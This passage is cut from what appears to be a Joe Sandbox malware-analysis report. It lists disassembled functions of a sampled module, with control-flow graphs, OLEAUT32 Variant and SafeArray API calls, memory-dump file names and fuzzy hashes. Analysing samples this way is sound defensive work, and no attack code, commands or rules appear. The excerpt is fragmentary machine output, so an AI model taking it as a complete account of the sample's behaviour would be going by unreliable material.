                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F0429F6
                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F042A08
                                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F042A2F
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F042ABB
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F042B3F
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F042C04
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F042C0B
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F042C12
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F042C96
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F042C9D
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F042CD6
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F042CDD
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F042CE4
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F042D1B
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F042D45
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F042D4C
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F042D53
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Clear$ArraySafe$BoundInit$DestroyElement
                                                                                                          • String ID:
                                                                                                          • API String ID: 214056513-0
                                                                                                          • Opcode ID: d17c0a96d15b01d7e37a1f53ff3bc3556d297f361953b4bac4b63dfa279fc8e6
                                                                                                          • Instruction ID: 7384b954dcfee8f45c954cb850a12f7644e49f149c8be3f9fdadba8218d15b88
                                                                                                          • Opcode Fuzzy Hash: d17c0a96d15b01d7e37a1f53ff3bc3556d297f361953b4bac4b63dfa279fc8e6
                                                                                                          • Instruction Fuzzy Hash: 70C15571608341DFD700CFA8C884A5ABBE9BFC9304F60896DF695CB261C775E845CBA2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F03AF30 Relevance: 24.3, APIs: 16, Instructions: 335COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 937 6f03af30-6f03af95 VariantInit * 3 938 6f03afa1-6f03afa7 937->938 939 6f03af97-6f03af9c call 6f09c1e0 937->939 941 6f03afb1-6f03afbf 938->941 942 6f03afa9-6f03afae 938->942 939->938 1020 6f03afc0 call d1d149 941->1020 1021 6f03afc0 call d1d148 941->1021 942->941 943 6f03afc2-6f03afc4 944 6f03afca-6f03afda call 6f0438e0 943->944 945 6f03b22c-6f03b252 VariantClear * 3 943->945 944->945 952 6f03afe0-6f03aff4 944->952 947 6f03b254-6f03b257 945->947 948 6f03b25c-6f03b26a 945->948 947->948 949 6f03b274-6f03b288 948->949 950 6f03b26c-6f03b271 948->950 950->949 953 6f03aff6-6f03aff9 952->953 954 6f03affe-6f03b015 VariantCopy 952->954 953->954 955 6f03b017-6f03b018 call 6f09c1e0 954->955 956 6f03b01d-6f03b033 VariantClear 954->956 955->956 958 6f03b035-6f03b03a call 6f09c1e0 956->958 959 6f03b03f-6f03b050 956->959 958->959 961 6f03b052-6f03b054 959->961 962 6f03b056-6f03b058 959->962 963 6f03b05b-6f03b05f 961->963 962->963 964 6f03b061-6f03b063 963->964 965 6f03b065 963->965 966 6f03b067-6f03b09a 964->966 965->966 1018 6f03b09d call d1d149 966->1018 1019 6f03b09d call d1d148 966->1019 967 6f03b09f-6f03b0a1 967->945 968 6f03b0a7-6f03b0b3 call 6f089bb5 967->968 971 6f03b0c1 968->971 972 6f03b0b5-6f03b0bf 968->972 973 6f03b0c3-6f03b0ca 971->973 972->973 974 6f03b0d0-6f03b0d9 973->974 974->974 975 6f03b0db-6f03b111 call 6f0891e1 call 6f08a136 974->975 980 6f03b113-6f03b118 call 6f09c1e0 975->980 981 6f03b11d-6f03b12b 975->981 980->981 982 6f03b131-6f03b133 981->982 983 6f03b12d-6f03b12f 981->983 985 6f03b136-6f03b13a 982->985 983->985 986 6f03b140 985->986 987 6f03b13c-6f03b13e 985->987 988 6f03b142-6f03b174 986->988 987->988 1016 6f03b17a call d1d149 988->1016 1017 6f03b17a call d1d148 988->1017 989 6f03b17c-6f03b17e 990 6f03b180-6f03b18a 989->990 991 6f03b1ff-6f03b203 989->991 994 6f03b190-6f03b1b9 SafeArrayGetLBound SafeArrayGetUBound 990->994 995 6f03b28d-6f03b2b8 VariantClear * 3 990->995 992 6f03b210-6f03b215 991->992 993 6f03b205-6f03b20e call 6f089c35 991->993 999 6f03b223-6f03b229 call 6f089b35 992->999 1000 6f03b217-6f03b220 call 6f089c35 992->1000 993->992 1001 6f03b28b 994->1001 1002 6f03b1bf-6f03b1cd SafeArrayAccessData 994->1002 997 6f03b2c2-6f03b2d0 995->997 998 6f03b2ba-6f03b2bf 995->998 1005 6f03b2d2-6f03b2d7 997->1005 1006 6f03b2da-6f03b2ee 997->1006 998->997 999->945 1000->999 1001->995 1002->1001 1008 6f03b1d3-6f03b1f7 call 6f0891e1 call 6f08a530 SafeArrayUnaccessData 1002->1008 1005->1006 1008->1001 1015 6f03b1fd 1008->1015 1015->991 1016->989 1017->989 1018->967 1019->967 1020->943 1021->943
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F03AF75
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F03AF7C
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F03AF83
                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 6F03B00D
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F03B027
                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F03B19C
                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F03B1AA
                                                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 6F03B1C5
                                                                                                          • _memmove.LIBCMT ref: 6F03B1E6
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 6F03B1EF
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F03B237
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F03B23E
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F03B245
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F03B29D
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F03B2A4
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F03B2AB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Clear$ArraySafe$Init$BoundData$AccessCopyUnaccess_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 3403836469-0
                                                                                                          • Opcode ID: b2fce5f8ad001ea2adb6b01e0fe835996d0d4398fab9fea091d39d87964e3239
                                                                                                          • Instruction ID: b8fbaf7944765eb9246ca3d24af61d4cb8903d156b5b646e12f45490ac3dcfea
                                                                                                          • Opcode Fuzzy Hash: b2fce5f8ad001ea2adb6b01e0fe835996d0d4398fab9fea091d39d87964e3239
                                                                                                          • Instruction Fuzzy Hash: F1C17EB2A047429FD700DFA8C884A5BB7E9FF89304F504A6DF659CB251D731E905CB92
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04D410 Relevance: 24.3, APIs: 16, Instructions: 290COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1022 6f04d410-6f04d44c 1023 6f04d472-6f04d4e0 VariantInit * 3 1022->1023 1024 6f04d44e-6f04d465 1022->1024 1025 6f04d4e2-6f04d4ea 1023->1025 1026 6f04d4ec-6f04d4f2 1023->1026 1027 6f04d4f6-6f04d504 1025->1027 1026->1027 1028 6f04d506-6f04d50d 1027->1028 1029 6f04d51e-6f04d527 1027->1029 1030 6f04d514-6f04d516 1028->1030 1031 6f04d50f-6f04d512 1028->1031 1032 6f04d538-6f04d53c 1029->1032 1033 6f04d529-6f04d530 1029->1033 1035 6f04d518-6f04d51c 1030->1035 1031->1035 1034 6f04d540-6f04d544 1032->1034 1033->1032 1036 6f04d532-6f04d536 1033->1036 1037 6f04d704-6f04d72f VariantClear * 3 1034->1037 1038 6f04d54a-6f04d5c0 call 6f089d66 SafeArrayCreateVector * 2 SafeArrayAccessData 1034->1038 1035->1028 1035->1029 1036->1034 1040 6f04d731-6f04d757 1037->1040 1041 6f04d76c-6f04d783 1037->1041 1046 6f04d5c6-6f04d5ea call 6f08a530 SafeArrayUnaccessData 1038->1046 1047 6f04d5c2-6f04d5c4 1038->1047 1043 6f04d470 1040->1043 1044 6f04d75d 1040->1044 1043->1023 1048 6f04d5ec-6f04d605 SafeArrayPutElement 1046->1048 1047->1048 1051 6f04d6e5-6f04d6eb 1048->1051 1052 6f04d60b-6f04d629 1048->1052 1055 6f04d6f6-6f04d6f8 1051->1055 1056 6f04d6ed-6f04d6f3 call 6f089d2c 1051->1056 1053 6f04d633-6f04d64f SafeArrayPutElement VariantClear 1052->1053 1054 6f04d62b-6f04d630 1052->1054 1053->1051 1060 6f04d655-6f04d664 1053->1060 1054->1053 1057 6f04d701 1055->1057 1058 6f04d6fa-6f04d6fb SafeArrayDestroy 1055->1058 1056->1055 1057->1037 1058->1057 1061 6f04d762-6f04d767 call 6f09c1e0 1060->1061 1062 6f04d66a-6f04d694 1060->1062 1061->1041 1075 6f04d697 call d1d149 1062->1075 1076 6f04d697 call d1d148 1062->1076 1065 6f04d699-6f04d69b 1065->1051 1066 6f04d69d-6f04d6a9 1065->1066 1066->1051 1067 6f04d6ab-6f04d6c1 call 6f03db30 1066->1067 1067->1051 1070 6f04d6c3-6f04d6d5 call 6f0456b0 call 6f046880 1067->1070 1074 6f04d6da-6f04d6e0 1070->1074 1074->1051 1075->1065 1076->1065
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32 ref: 6F04D4B3
                                                                                                          • VariantInit.OLEAUT32 ref: 6F04D4C5
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F04D4CC
                                                                                                          • _malloc.LIBCMT ref: 6F04D551
                                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6F04D58B
                                                                                                          • SafeArrayCreateVector.OLEAUT32 ref: 6F04D5A6
                                                                                                          • SafeArrayAccessData.OLEAUT32 ref: 6F04D5B8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayInitSafeVariant$CreateVector$AccessData_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1552365394-0
                                                                                                          • Opcode ID: fb77521ed751583b4ff666417b8ca5a79d30be1542c1523310ba765f3877d787
                                                                                                          • Instruction ID: c324728e404657c2d0e64e6be7169450013d9d9bda89534f55eae9d7fbfcebbb
                                                                                                          • Opcode Fuzzy Hash: fb77521ed751583b4ff666417b8ca5a79d30be1542c1523310ba765f3877d787
                                                                                                          • Instruction Fuzzy Hash: 43B14576608301DFD714CF28C880B5AB7EAFF89314F14896DE8959B251EB31E905CB92
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04D468 Relevance: 21.2, APIs: 14, Instructions: 226COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1236 6f04d468 1237 6f04d470-6f04d4e0 VariantInit * 3 1236->1237 1239 6f04d4e2-6f04d4ea 1237->1239 1240 6f04d4ec-6f04d4f2 1237->1240 1241 6f04d4f6-6f04d504 1239->1241 1240->1241 1242 6f04d506-6f04d50d 1241->1242 1243 6f04d51e-6f04d527 1241->1243 1244 6f04d514-6f04d516 1242->1244 1245 6f04d50f-6f04d512 1242->1245 1246 6f04d538-6f04d53c 1243->1246 1247 6f04d529-6f04d530 1243->1247 1249 6f04d518-6f04d51c 1244->1249 1245->1249 1248 6f04d540-6f04d544 1246->1248 1247->1246 1250 6f04d532-6f04d536 1247->1250 1251 6f04d704-6f04d72f VariantClear * 3 1248->1251 1252 6f04d54a-6f04d5c0 call 6f089d66 SafeArrayCreateVector * 2 SafeArrayAccessData 1248->1252 1249->1242 1249->1243 1250->1248 1254 6f04d731-6f04d757 1251->1254 1255 6f04d76c-6f04d783 1251->1255 1259 6f04d5c6-6f04d5ea call 6f08a530 SafeArrayUnaccessData 1252->1259 1260 6f04d5c2-6f04d5c4 1252->1260 1254->1237 1257 6f04d75d 1254->1257 1261 6f04d5ec-6f04d605 SafeArrayPutElement 1259->1261 1260->1261 1264 6f04d6e5-6f04d6eb 1261->1264 1265 6f04d60b-6f04d629 1261->1265 1268 6f04d6f6-6f04d6f8 1264->1268 1269 6f04d6ed-6f04d6f3 call 6f089d2c 1264->1269 1266 6f04d633-6f04d64f SafeArrayPutElement VariantClear 1265->1266 1267 6f04d62b-6f04d630 1265->1267 1266->1264 1273 6f04d655-6f04d664 1266->1273 1267->1266 1270 6f04d701 1268->1270 1271 6f04d6fa-6f04d6fb SafeArrayDestroy 1268->1271 1269->1268 1270->1251 1271->1270 1274 6f04d762-6f04d767 call 6f09c1e0 1273->1274 1275 6f04d66a-6f04d694 1273->1275 1274->1255 1288 6f04d697 call d1d149 1275->1288 1289 6f04d697 call d1d148 1275->1289 1278 6f04d699-6f04d69b 1278->1264 1279 6f04d69d-6f04d6a9 1278->1279 1279->1264 1280 6f04d6ab-6f04d6c1 call 6f03db30 1279->1280 1280->1264 1283 6f04d6c3-6f04d6ca call 6f0456b0 1280->1283 1285 6f04d6cf-6f04d6d5 call 6f046880 1283->1285 1287 6f04d6da-6f04d6e0 1285->1287 1287->1264 1288->1278 1289->1278
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32 ref: 6F04D4B3
                                                                                                          • VariantInit.OLEAUT32 ref: 6F04D4C5
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F04D4CC
                                                                                                          • _malloc.LIBCMT ref: 6F04D551
                                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6F04D58B
                                                                                                          • SafeArrayCreateVector.OLEAUT32 ref: 6F04D5A6
                                                                                                          • SafeArrayAccessData.OLEAUT32 ref: 6F04D5B8
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F04D601
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F04D63E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$InitVariant$CreateElementVector$AccessData_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 2723946344-0
                                                                                                          • Opcode ID: 46dc52a9d7088bc55a6a0e8095678b179d9144b5fc39af296925de4ff71e79ff
                                                                                                          • Instruction ID: b5cecf41f879500d6f0e53399b1258e3206d9fbb9ceb28c321935c4f08e91cac
                                                                                                          • Opcode Fuzzy Hash: 46dc52a9d7088bc55a6a0e8095678b179d9144b5fc39af296925de4ff71e79ff
                                                                                                          • Instruction Fuzzy Hash: 4F9146B5604301DFD714CF68C880B5AB7F6BF89314F14896DE8958B261EB30E905CB92
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F045140 Relevance: 21.2, APIs: 14, Instructions: 203COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1290 6f045140-6f0451a8 VariantInit call 6f052820 1293 6f0451ae-6f0451ed SafeArrayCreateVector * 2 SafeArrayAccessData 1290->1293 1294 6f045339-6f04533e 1290->1294 1297 6f0451f3-6f045218 call 6f08a530 SafeArrayUnaccessData 1293->1297 1298 6f0451ef-6f0451f1 1293->1298 1295 6f045340-6f045346 call 6f089d2c 1294->1295 1296 6f045349-6f04534b 1294->1296 1295->1296 1300 6f045354-6f045372 VariantClear 1296->1300 1301 6f04534d-6f04534e SafeArrayDestroy 1296->1301 1302 6f04521a-6f045230 SafeArrayPutElement 1297->1302 1298->1302 1301->1300 1302->1294 1305 6f045236-6f045250 1302->1305 1307 6f045252-6f045257 1305->1307 1308 6f04525a-6f045276 SafeArrayPutElement VariantClear 1305->1308 1307->1308 1308->1294 1309 6f04527c-6f04529a 1308->1309 1310 6f0452a4-6f0452c0 SafeArrayPutElement VariantClear 1309->1310 1311 6f04529c-6f04529f 1309->1311 1310->1294 1312 6f0452c2-6f0452d6 SafeArrayPutElement 1310->1312 1311->1310 1312->1294 1313 6f0452d8-6f0452e3 1312->1313 1314 6f0452e5-6f0452ea call 6f09c1e0 1313->1314 1315 6f0452ef-6f04531a 1313->1315 1314->1315 1320 6f04531b call d1d149 1315->1320 1321 6f04531b call d1d148 1315->1321 1317 6f04531d-6f04531f 1317->1294 1318 6f045321-6f045333 1317->1318 1318->1294 1319 6f045335 1318->1319 1319->1294 1320->1317 1321->1317
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F045177
                                                                                                            • Part of subcall function 6F052820: _malloc.LIBCMT ref: 6F052871
                                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000004), ref: 6F0451B9
                                                                                                          • SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6F0451D5
                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,00000000), ref: 6F0451E5
                                                                                                          • _memmove.LIBCMT ref: 6F0451FF
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6F045208
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6F04522C
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6F045263
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04526C
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6F0452AD
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F0452B6
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000002,00000002), ref: 6F0452D2
                                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F04534E
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F045358
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$ElementVariant$Clear$CreateDataVector$AccessDestroyInitUnaccess_malloc_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 452649785-0
                                                                                                          • Opcode ID: ba562950b725d37b366ec9f7e5dbdd9507367d0a1a7672b56a3d91320999744a
                                                                                                          • Instruction ID: e3e2b159bf0b977422c88b0868555df79cb9c971c4541358f32faf7c0a79333e
                                                                                                          • Opcode Fuzzy Hash: ba562950b725d37b366ec9f7e5dbdd9507367d0a1a7672b56a3d91320999744a
                                                                                                          • Instruction Fuzzy Hash: 4F713B75A0060AEBDB01CFA8C984BAFBBB8FF49314F00812AE905D7241D774E915CBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0444C0 Relevance: 19.8, APIs: 13, Instructions: 261COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1322 6f0444c0-6f044538 VariantInit * 2 SafeArrayCreateVector 1323 6f044542-6f044564 SafeArrayPutElement VariantClear 1322->1323 1324 6f04453a-6f04453d 1322->1324 1325 6f04476f-6f044774 1323->1325 1326 6f04456a-6f044598 SafeArrayCreateVector SafeArrayPutElement 1323->1326 1324->1323 1327 6f044776-6f044777 SafeArrayDestroy 1325->1327 1328 6f04477d-6f04479b VariantClear * 2 1325->1328 1326->1325 1329 6f04459e-6f0445b9 SafeArrayPutElement 1326->1329 1327->1328 1330 6f0447b0-6f0447c4 1328->1330 1331 6f04479d-6f0447ad 1328->1331 1329->1325 1332 6f0445bf-6f0445d2 SafeArrayPutElement 1329->1332 1331->1330 1332->1325 1333 6f0445d8-6f0445e3 1332->1333 1334 6f0445e5-6f0445ea call 6f09c1e0 1333->1334 1335 6f0445ef-6f044604 1333->1335 1334->1335 1335->1325 1338 6f04460a-6f044615 1335->1338 1338->1325 1339 6f04461b-6f04469f 1338->1339 1346 6f0446a1-6f04471f 1339->1346 1352 6f044721-6f044758 1346->1352 1355 6f04475f-6f04476a call 6f04de60 1352->1355 1356 6f04475a call 6f08919e 1352->1356 1358 6f04476c 1355->1358 1356->1355 1358->1325
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F0444FF
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F044505
                                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6F044516
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6F044551
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04455A
                                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6F044579
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6F044594
                                                                                                          • SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6F0445B5
                                                                                                          • SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6F0445CE
                                                                                                          • std::tr1::_Xweak.LIBCPMT ref: 6F04475A
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F044777
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F044787
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04478D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
